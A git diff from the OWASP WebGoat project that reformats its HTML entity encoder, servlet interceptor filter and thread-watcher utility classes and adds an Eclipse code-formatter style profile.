-		    buf.append("&#" + ((int) ch) + ";");
-		}
-		else
-		{
-		    buf.append(ch);
-		}
-	    }
-	    else
-	    {
-		buf.append("&" + entity + ";");
-	    }
+		for (int i = 0; i < entities.length; i++)
+			e2i.put((String) entities[i][0], (Integer) entities[i][1]);
+		for (int i = 0; i < entities.length; i++)
+			i2e.put((Integer) entities[i][1], (String) entities[i][0]);
 	}
 
-	return buf.toString();
-    }
-
-
-    /**
-     *  Given a string containing entity escapes, returns a string containing the actual Unicode
-     *  characters corresponding to the escapes. Adapted from
-     *  http://www.purpletech.com/code/src/com/purpletech/util/Utils.java.
-     *
-     * @param  s1  Description of the Parameter
-     * @return     Description of the Return Value
-     */
-    public static String decode(String s1)
-    {
-	StringBuffer buf = new StringBuffer();
-
-	int i;
-	for (i = 0; i < s1.length(); ++i)
+	/**
+	 * Turns funky characters into HTML entity equivalents
+	 * <p>
+	 * 
+	 * e.g. <tt>"bread" & "butter"</tt> => <tt>&amp;quot;bread&amp;quot; &amp;amp;
+	 *  &amp;quot;butter&amp;quot;</tt> .
+	 * Update: supports nearly all HTML entities, including funky accents. See the source code for
+	 * more detail. Adapted from http://www.purpletech.com/code/src/com/purpletech/util/Utils.java.
+	 * 
+	 * @param s1
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	public static String encode(String s1)
 	{
-	    char ch = s1.charAt(i);
+		StringBuffer buf = new StringBuffer();
 
-	    if (ch == '&')
-	    {
-		int semi = s1.indexOf(';', i + 1);
-		if (semi == -1)
+		int i;
+		for (i = 0; i < s1.length(); ++i)
 		{
-		    buf.append(ch);
-		    continue;
+			char ch = s1.charAt(i);
+
+			String entity = i2e.get(new Integer((int) ch));
+
+			if (entity == null)
+			{
+				if (((int) ch) > 128)
+				{
+					buf.append("&#" + ((int) ch) + ";");
+				}
+				else
+				{
+					buf.append(ch);
+				}
+			}
+			else
+			{
+				buf.append("&" + entity + ";");
+			}
 		}
-		String entity = s1.substring(i + 1, semi);
-		Integer iso;
-		if (entity.charAt(0) == '#')
-		{
-		    iso = new Integer(entity.substring(1));
-		}
-		else
-		{
-		    iso = e2i.get(entity);
-		}
-		if (iso == null)
-		{
-		    buf.append("&" + entity + ";");
-		}
-		else
-		{
-		    buf.append((char) (iso.intValue()));
-		}
-		i = semi;
-	    }
-	    else
-	    {
-		buf.append(ch);
-	    }
+
+		return buf.toString();
 	}
 
-	return buf.toString();
-    }
+	/**
+	 * Given a string containing entity escapes, returns a string containing the actual Unicode
+	 * characters corresponding to the escapes. Adapted from
+	 * http://www.purpletech.com/code/src/com/purpletech/util/Utils.java.
+	 * 
+	 * @param s1
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	public static String decode(String s1)
+	{
+		StringBuffer buf = new StringBuffer();
+
+		int i;
+		for (i = 0; i < s1.length(); ++i)
+		{
+			char ch = s1.charAt(i);
+
+			if (ch == '&')
+			{
+				int semi = s1.indexOf(';', i + 1);
+				if (semi == -1)
+				{
+					buf.append(ch);
+					continue;
+				}
+				String entity = s1.substring(i + 1, semi);
+				Integer iso;
+				if (entity.charAt(0) == '#')
+				{
+					iso = new Integer(entity.substring(1));
+				}
+				else
+				{
+					iso = e2i.get(entity);
+				}
+				if (iso == null)
+				{
+					buf.append("&" + entity + ";");
+				}
+				else
+				{
+					buf.append((char) (iso.intValue()));
+				}
+				i = semi;
+			}
+			else
+			{
+				buf.append(ch);
+			}
+		}
+
+		return buf.toString();
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/util/Interceptor.java b/main/project/JavaSource/org/owasp/webgoat/util/Interceptor.java
index 9ddd00a37..a72d4ab4a 100644
--- a/main/project/JavaSource/org/owasp/webgoat/util/Interceptor.java
+++ b/main/project/JavaSource/org/owasp/webgoat/util/Interceptor.java
@@ -1,6 +1,7 @@
 /**
  * 
  */
+
 package org.owasp.webgoat.util;
 
 import java.io.IOException;
@@ -8,9 +9,7 @@ import java.io.BufferedReader;
 import java.io.PrintWriter;
 import java.io.InputStreamReader;
 import java.net.UnknownHostException;
-
 import java.net.Socket;
-
 import javax.servlet.Filter;
 import javax.servlet.FilterChain;
 import javax.servlet.FilterConfig;
@@ -20,134 +19,127 @@ import javax.servlet.ServletResponse;
 import javax.servlet.RequestDispatcher;
 import javax.servlet.http.HttpServletRequest;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
+ * 
  * @author sherif koussa - Macadamian Technologies
- *
+ * 
  */
 public class Interceptor implements Filter
 {
 
-    private static final String OSG_SERVER_NAME = "OSGServerName";
+	private static final String OSG_SERVER_NAME = "OSGServerName";
 
-    private static final String OSG_SERVER_PORT = "OSGServerPort";
+	private static final String OSG_SERVER_PORT = "OSGServerPort";
 
-
-    /* (non-Javadoc)
-     * @see javax.servlet.Filter#destroy()
-     */
-    public void destroy()
-    {
-    // TODO Auto-generated method stub
-
-    }
-
-
-    public void doFilter(ServletRequest request, ServletResponse response,
-	    FilterChain chain) throws IOException, ServletException
-    {
-
-	HttpServletRequest req = (HttpServletRequest) request;
-
-	Socket osgSocket = null;
-	PrintWriter out = null;
-	BufferedReader in = null;
-	String osgServerName = req.getSession().getServletContext()
-		.getInitParameter(OSG_SERVER_NAME);
-	String osgServerPort = req.getSession().getServletContext()
-		.getInitParameter(OSG_SERVER_PORT);
-
-	try
+	/*
+	 * (non-Javadoc)
+	 * 
+	 * @see javax.servlet.Filter#destroy()
+	 */
+	public void destroy()
 	{
-	    //If these parameters are not defined then no communication will happen with OSG
-	    if (osgServerName != null && osgServerName.length() != 0
-		    && osgServerPort != null && osgServerPort.length() != 0)
-	    {
-		osgSocket = new Socket(osgServerName, Integer
-			.parseInt(osgServerPort));
-		if (osgSocket != null)
+		// TODO Auto-generated method stub
+
+	}
+
+	public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException,
+			ServletException
+	{
+
+		HttpServletRequest req = (HttpServletRequest) request;
+
+		Socket osgSocket = null;
+		PrintWriter out = null;
+		BufferedReader in = null;
+		String osgServerName = req.getSession().getServletContext().getInitParameter(OSG_SERVER_NAME);
+		String osgServerPort = req.getSession().getServletContext().getInitParameter(OSG_SERVER_PORT);
+
+		try
 		{
-		    out = new PrintWriter(osgSocket.getOutputStream(), true);
-		    in = new BufferedReader(new InputStreamReader(osgSocket
-			    .getInputStream()));
-		    //String message = "HTTPRECEIVEHTTPREQUEST,-,DataValidation_SqlInjection_Basic.aspx";
-		    //out.println(message);
+			// If these parameters are not defined then no communication will happen with OSG
+			if (osgServerName != null && osgServerName.length() != 0 && osgServerPort != null
+					&& osgServerPort.length() != 0)
+			{
+				osgSocket = new Socket(osgServerName, Integer.parseInt(osgServerPort));
+				if (osgSocket != null)
+				{
+					out = new PrintWriter(osgSocket.getOutputStream(), true);
+					in = new BufferedReader(new InputStreamReader(osgSocket.getInputStream()));
+					// String message =
+					// "HTTPRECEIVEHTTPREQUEST,-,DataValidation_SqlInjection_Basic.aspx";
+					// out.println(message);
 
-		    //System.out.println(in.readLine());
+					// System.out.println(in.readLine());
+				}
+			}
+
+		} catch (UnknownHostException e)
+		{
+			e.printStackTrace();
+
+		} catch (IOException e)
+		{
+			e.printStackTrace();
+		} finally
+		{
+			if (out != null)
+			{
+				out.close();
+			}
+			if (in != null)
+			{
+				in.close();
+			}
+			if (osgSocket != null)
+			{
+				osgSocket.close();
+			}
 		}
-	    }
+
+		String url = req.getRequestURL().toString();
+
+		RequestDispatcher disp = req.getRequestDispatcher(url.substring(url.lastIndexOf("WebGoat/")
+				+ "WebGoat".length()));
+
+		disp.forward(request, response);
 
 	}
-	catch (UnknownHostException e)
+
+	/*
+	 * (non-Javadoc)
+	 * 
+	 * @see javax.servlet.Filter#init(javax.servlet.FilterConfig)
+	 */
+	public void init(FilterConfig arg0) throws ServletException
 	{
-	    e.printStackTrace();
+		// TODO Auto-generated method stub
 
 	}
-	catch (IOException e)
-	{
-	    e.printStackTrace();
-	}
-	finally
-	{
-	    if (out != null)
-	    {
-		out.close();
-	    }
-	    if (in != null)
-	    {
-		in.close();
-	    }
-	    if (osgSocket != null)
-	    {
-		osgSocket.close();
-	    }
-	}
-
-	String url = req.getRequestURL().toString();
-
-	RequestDispatcher disp = req.getRequestDispatcher(url.substring(url
-		.lastIndexOf("WebGoat/")
-		+ "WebGoat".length()));
-
-	disp.forward(request, response);
-
-    }
-
-
-    /* (non-Javadoc)
-     * @see javax.servlet.Filter#init(javax.servlet.FilterConfig)
-     */
-    public void init(FilterConfig arg0) throws ServletException
-    {
-    // TODO Auto-generated method stub
-
-    }
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/util/ThreadWatcher.java b/main/project/JavaSource/org/owasp/webgoat/util/ThreadWatcher.java
index fdd4f6a42..f4559dbcd 100644
--- a/main/project/JavaSource/org/owasp/webgoat/util/ThreadWatcher.java
+++ b/main/project/JavaSource/org/owasp/webgoat/util/ThreadWatcher.java
@@ -1,117 +1,103 @@
+
 package org.owasp.webgoat.util;
 
 import java.util.BitSet;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- *@author     jwilliams@aspectsecurity.com
- *@created    November 6, 2002
+ * 
+ * @author jwilliams@aspectsecurity.com
+ * @created November 6, 2002
  */
 public class ThreadWatcher implements Runnable
 {
 
-    // time to live in milliseconds
-    private BitSet myInterrupted;
+	// time to live in milliseconds
+	private BitSet myInterrupted;
 
-    private Process myProcess;
+	private Process myProcess;
 
-    private int myTimeout;
+	private int myTimeout;
 
+	/**
+	 * Constructor for the ThreadWatcher object
+	 * 
+	 * @param p
+	 *            Description of the Parameter
+	 * @param interrupted
+	 *            Description of the Parameter
+	 * @param timeout
+	 *            Description of the Parameter
+	 */
+	public ThreadWatcher(Process p, BitSet interrupted, int timeout)
+	{
+		myProcess = p;
 
-    /**
-     *  Constructor for the ThreadWatcher object
-     *
-     *@param  p            Description of the Parameter
-     *@param  interrupted  Description of the Parameter
-     *@param  timeout      Description of the Parameter
-     */
-    public ThreadWatcher(Process p, BitSet interrupted, int timeout)
-    {
-	myProcess = p;
-
-	// thread used by whoever constructed this watcher
-	myTimeout = timeout;
-	myInterrupted = interrupted;
-    }
-
-
-    /*
-     *  Interrupt the thread by marking the interrupted bit and killing the process
-     */
-
-    /**
-     *  Description of the Method
-     */
-    public void interrupt()
-    {
-	myInterrupted.set(0);
-
-	// set interrupted bit (bit 0 of the bitset) to 1
-	myProcess.destroy();
+		// thread used by whoever constructed this watcher
+		myTimeout = timeout;
+		myInterrupted = interrupted;
+	}
 
 	/*
-	 *  try
-	 *  {
-	 *  myProcess.getInputStream().close();
-	 *  }
-	 *  catch( IOException e1 )
-	 *  {
-	 *  / do nothing -- input streams are probably already closed
-	 *  }
-	 *  try
-	 *  {
-	 *  myProcess.getErrorStream().close();
-	 *  }
-	 *  catch( IOException e2 )
-	 *  {
-	 *  / do nothing -- input streams are probably already closed
-	 *  }
-	 *  myThread.interrupt();
+	 * Interrupt the thread by marking the interrupted bit and killing the process
 	 */
-    }
 
+	/**
+	 * Description of the Method
+	 */
+	public void interrupt()
+	{
+		myInterrupted.set(0);
 
-    /**
-     *  Main processing method for the ThreadWatcher object
-     */
-    public void run()
-    {
-	try
-	{
-	    Thread.sleep(myTimeout);
-	}
-	catch (InterruptedException e)
-	{
-	    // do nothing -- if watcher is interrupted, so is thread
+		// set interrupted bit (bit 0 of the bitset) to 1
+		myProcess.destroy();
+
+		/*
+		 * try { myProcess.getInputStream().close(); } catch( IOException e1 ) { / do nothing --
+		 * input streams are probably already closed } try { myProcess.getErrorStream().close(); }
+		 * catch( IOException e2 ) { / do nothing -- input streams are probably already closed }
+		 * myThread.interrupt();
+		 */
 	}
 
-	interrupt();
-    }
+	/**
+	 * Main processing method for the ThreadWatcher object
+	 */
+	public void run()
+	{
+		try
+		{
+			Thread.sleep(myTimeout);
+		} catch (InterruptedException e)
+		{
+			// do nothing -- if watcher is interrupted, so is thread
+		}
+
+		interrupt();
+	}
 }
diff --git a/main/project/config/JavaStyle_WebGoat.xml b/main/project/config/JavaStyle_WebGoat.xml
new file mode 100644
index 000000000..a7c2178e2
--- /dev/null
+++ b/main/project/config/JavaStyle_WebGoat.xml
@@ -0,0 +1,264 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<profiles version="11">
+<profile kind="CodeFormatterProfile" name="WebGoat" version="11">
+<setting id="org.eclipse.jdt.core.formatter.comment.insert_new_line_before_root_tags" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_comma_in_annotation" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_comma_in_type_parameters" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_brace_in_type_declaration" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_comma_in_type_arguments" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.brace_position_for_anonymous_type_declaration" value="next_line"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_colon_in_case" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_opening_brace_in_array_initializer" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_new_line_in_empty_annotation_declaration" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_new_line_before_closing_brace_in_array_initializer" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_opening_paren_in_annotation" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.blank_lines_before_field" value="0"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_opening_paren_in_while" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_between_empty_parens_in_annotation_type_member_declaration" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_new_line_before_else_in_if_statement" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_prefix_operator" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.keep_else_statement_on_same_line" value="false"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_ellipsis" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.comment.insert_new_line_for_parameter" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_brace_in_annotation_type_declaration" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.indent_breaks_compare_to_cases" value="true"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_at_in_annotation" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.alignment_for_multiple_fields" value="16"/>
+<setting id="org.eclipse.jdt.core.formatter.alignment_for_expressions_in_array_initializer" value="16"/>
+<setting id="org.eclipse.jdt.core.formatter.alignment_for_conditional_expression" value="80"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_paren_in_for" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_binary_operator" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_question_in_wildcard" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.brace_position_for_array_initializer" value="end_of_line"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_between_empty_parens_in_enum_constant" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_new_line_before_finally_in_try_statement" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_new_line_before_catch_in_try_statement" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_paren_in_while" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.blank_lines_after_package" value="1"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_comma_in_type_parameters" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.continuation_indentation" value="2"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_postfix_operator" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.alignment_for_arguments_in_method_invocation" value="18"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_closing_angle_bracket_in_type_arguments" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_comma_in_superinterfaces" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.blank_lines_before_new_chunk" value="1"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_binary_operator" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.blank_lines_before_package" value="1"/>
+<setting id="org.eclipse.jdt.core.compiler.source" value="1.5"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_comma_in_enum_constant_arguments" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_opening_paren_in_constructor_declaration" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_closing_angle_bracket_in_type_arguments" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.comment.format_line_comments" value="true"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_comma_in_enum_declarations" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_brace_in_block" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.alignment_for_arguments_in_explicit_constructor_call" value="16"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_comma_in_method_invocation_arguments" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.blank_lines_before_member_type" value="1"/>
+<setting id="org.eclipse.jdt.core.formatter.align_type_members_on_columns" value="false"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_opening_paren_in_enum_constant" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_opening_paren_in_for" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_brace_in_method_declaration" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.alignment_for_selector_in_method_invocation" value="16"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_opening_paren_in_switch" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_unary_operator" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_colon_in_case" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.comment.indent_parameter_description" value="true"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_closing_paren_in_method_declaration" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_closing_paren_in_switch" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_brace_in_enum_declaration" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_new_line_after_annotation" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_angle_bracket_in_type_parameters" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_new_line_in_empty_type_declaration" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.comment.clear_blank_lines_in_block_comment" value="true"/>
+<setting id="org.eclipse.jdt.core.formatter.lineSplit" value="120"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_paren_in_if" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_between_brackets_in_array_type_reference" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_opening_paren_in_parenthesized_expression" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_comma_in_explicitconstructorcall_arguments" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_brace_in_constructor_declaration" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.blank_lines_before_first_class_body_declaration" value="0"/>
+<setting id="org.eclipse.jdt.core.formatter.indentation.size" value="4"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_between_empty_parens_in_method_declaration" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_paren_in_enum_constant" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.alignment_for_superclass_in_type_declaration" value="16"/>
+<setting id="org.eclipse.jdt.core.formatter.alignment_for_assignment" value="0"/>
+<setting id="org.eclipse.jdt.core.compiler.problem.assertIdentifier" value="error"/>
+<setting id="org.eclipse.jdt.core.formatter.tabulation.char" value="tab"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_comma_in_constructor_declaration_parameters" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_prefix_operator" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.indent_statements_compare_to_body" value="true"/>
+<setting id="org.eclipse.jdt.core.formatter.blank_lines_before_method" value="1"/>
+<setting id="org.eclipse.jdt.core.formatter.format_guardian_clause_on_one_line" value="true"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_colon_in_for" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_closing_paren_in_cast" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.alignment_for_parameters_in_constructor_declaration" value="16"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_colon_in_labeled_statement" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.brace_position_for_annotation_type_declaration" value="next_line"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_new_line_in_empty_method_body" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_closing_paren_in_method_invocation" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_opening_bracket_in_array_allocation_expression" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_brace_in_enum_constant" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_comma_in_annotation" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_at_in_annotation_type_declaration" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_comma_in_method_declaration_throws" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_closing_paren_in_if" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.brace_position_for_switch" value="next_line"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_comma_in_method_declaration_throws" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_parenthesized_expression_in_return" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_paren_in_annotation" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_question_in_conditional" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_question_in_wildcard" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_closing_bracket_in_array_allocation_expression" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_parenthesized_expression_in_throw" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_comma_in_type_arguments" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.compiler.problem.enumIdentifier" value="error"/>
+<setting id="org.eclipse.jdt.core.formatter.indent_switchstatements_compare_to_switch" value="true"/>
+<setting id="org.eclipse.jdt.core.formatter.brace_position_for_block" value="next_line"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_ellipsis" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_comma_in_for_inits" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.brace_position_for_method_declaration" value="next_line"/>
+<setting id="org.eclipse.jdt.core.formatter.compact_else_if" value="true"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_comma_in_array_initializer" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_comma_in_for_increments" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_closing_bracket_in_array_reference" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.brace_position_for_enum_constant" value="end_of_line"/>
+<setting id="org.eclipse.jdt.core.formatter.comment.indent_root_tags" value="true"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_comma_in_enum_declarations" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_comma_in_explicitconstructorcall_arguments" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_brace_in_switch" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_comma_in_superinterfaces" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_comma_in_method_declaration_parameters" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_comma_in_allocation_expression" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.tabulation.size" value="4"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_bracket_in_array_type_reference" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_new_line_after_opening_brace_in_array_initializer" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_closing_brace_in_block" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_bracket_in_array_reference" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_new_line_in_empty_enum_constant" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_opening_angle_bracket_in_type_arguments" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_opening_paren_in_constructor_declaration" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_opening_paren_in_if" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_comma_in_constructor_declaration_throws" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.comment.clear_blank_lines_in_javadoc_comment" value="false"/>
+<setting id="org.eclipse.jdt.core.formatter.alignment_for_throws_clause_in_constructor_declaration" value="16"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_assignment_operator" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_before_assignment_operator" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.indent_empty_lines" value="false"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_opening_paren_in_synchronized" value="do not insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_closing_paren_in_cast" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.insert_space_after_comma_in_method_declaration_parameters" value="insert"/>
+<setting id="org.eclipse.jdt.core.formatter.brace_position_for_block_in_case" value="next_line"/>
+<setting id="org.eclipse.jdt.core.formatter.number_of_empty_lines_to_preserve" value="1"/>
